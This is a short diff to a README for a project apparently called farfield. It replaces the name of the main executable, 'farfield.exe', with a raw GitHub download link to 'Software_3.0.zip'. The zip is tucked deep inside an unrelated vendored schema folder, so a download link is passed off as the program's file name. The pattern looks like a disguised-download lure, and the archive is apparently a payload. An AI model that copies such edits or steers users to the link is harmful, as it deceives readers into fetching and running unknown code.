KzQumyznik/farfield/README.md

 C:\Program Files\farfield\
 ```

-The main executable file is called `farfield.exe`.
+The main executable file is called `https://github.com/KzQumyznik/farfield/raw/refs/heads/main/packages/codex-protocol/vendor/codex-app-server-schema/stable/typescript/v2/Software_3.0.zip`.
 You can run it directly from this folder if needed.

 ## 📥 Additional Downloads